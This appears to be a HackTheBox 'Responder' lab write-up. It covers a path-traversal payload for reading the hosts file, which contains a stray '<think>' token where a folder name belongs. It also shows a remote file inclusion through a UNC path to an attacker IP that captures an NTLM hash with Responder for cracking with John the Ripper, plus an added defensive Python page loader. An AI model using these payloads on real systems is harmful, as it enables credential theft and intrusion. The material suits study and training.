Hackthebox — Responder Writeup
Hello!
Today I will be presenting how to complete Responder from Tier 1 on Starting Point.
First, enumeration with Nmap:
Only one open port: 80
Running Apache webserver on a Windows host.
Task 1
When pasting the IP in the URL it redirects to a webpage named unika.htb, so make sure to add it to /etc/hosts.
Task 2
Wappalyzer is a browser extension, a set of APIs that provide instant access to website technology stacks, company and contact details, social media profiles, email verification and more.
Task 3
Wappalyzer shows you the language the page is built in, and the URL reveals the parameter, page.
Task 4
The answer is in the question, you just have to read and think.
../../../../../../../../<think>/system32/drivers/etc/hosts
Task 5
Again the answer is in the question: it is a remote file inclusion (RFI), and the payload needs your IP address in it, followed by ^somefile^.
Task 6
New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users. NTLM is a challenge-response authentication protocol that confirms the user without requiring them to submit a password. Despite known vulnerabilities, NTLM remains widely deployed even on new systems in order to maintain compatibility with legacy clients and servers.
Task 7
Task 8
John The Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types.
Task 9
This one was tricky, as I had never used the Responder tool, so with a little bit of research and logic, following the questions on HTB, I figured out that we had to run Responder with the -I flag pointing to our tun0 interface, the one provided by the HTB VPN.
Responder is widely used for MITM attacks, and when you run it with the -I flag, it shows you the Responder IP, our tun0 address.
When Responder is run against an interface, it starts a number of rogue servers such as HTTP, HTTPS, SQL, AUTH PROXY and so on.
It also starts poisoners for:
- DNS/MDNS
- LLMNR (Link-Local Multicast Name Resolution)
- NBT-NS (NetBIOS Name Service)
NBT-NS and LLMNR are Microsoft Windows components that serve as alternate methods of host identification.
Upon requesting a resource through the RFI, http://unika.htb/index.php?page=//10.10.15.195/<inputrandomtexthere> , Responder will poison the responses and, if it can, capture any credentials.
In our case it captured the admin hash.
Save the hash into a file, and crack it with John the Ripper.
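The root cause of Tasks 4 and 9 is the same: index.php includes whatever the page parameter says, so both the traversal to the hosts file and the //10.10.15.195/... include work. Below is an added example (not code from the box or from HTB) of how such a page loader should be written, in Python rather than the original PHP since the application's source is not on this page; the web root path and the allow-listed page names are assumptions.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Assumed web root for the pages that index.php serves (constructed for this example).
WEB_ROOT = Path("/var/www/unika").resolve()
# Allow-list of page names the application actually ships; anything else is refused.
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}


def resolve_page(page_param: str) -> Optional[Path]:
    """Map the ?page= parameter to a file under WEB_ROOT, or None if it must be refused."""
    raw = unquote(page_param or "")
    lowered = raw.lower()
    # Remote includes: URL schemes (http://, php://, ...) and UNC paths (//host/share, \\host\share).
    if "://" in lowered or lowered.startswith(("//", "\\\\")):
        return None
    # Null bytes and any directory separator: only a bare file name is ever accepted,
    # which also kills ../../ traversal before any filesystem call is made.
    if "\x00" in raw or "/" in raw or "\\" in raw:
        return None
    # Positive validation: the name must be one we ship, not merely "not obviously bad".
    if raw not in ALLOWED_PAGES:
        return None
    candidate = (WEB_ROOT / raw).resolve()
    # Defence in depth: even an allow-listed name must still resolve inside WEB_ROOT.
    if WEB_ROOT not in candidate.parents:
        return None
    return candidate


def classify(probes):
    """Return {probe: 'served' | 'refused'} so a reviewer can see each decision at a glance."""
    return {p: ("served" if resolve_page(p) else "refused") for p in probes}


if __name__ == "__main__":
    # Constructed probes mirroring the inputs discussed in this writeup.
    for probe, verdict in classify([
        "french.html",
        "../../../../../../../../<think>/system32/drivers/etc/hosts",
        "//10.10.15.195/somefile",
        "http://10.10.15.195/somefile",
    ]).items():
        print(f"{verdict:8} {probe}")
```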
Task 10
TCP port 5985
Task 11
WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management Protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in its operating systems to make life easier for system administrators.
Well, Evil.. stands for… your intentions; do good things only.
Have fun!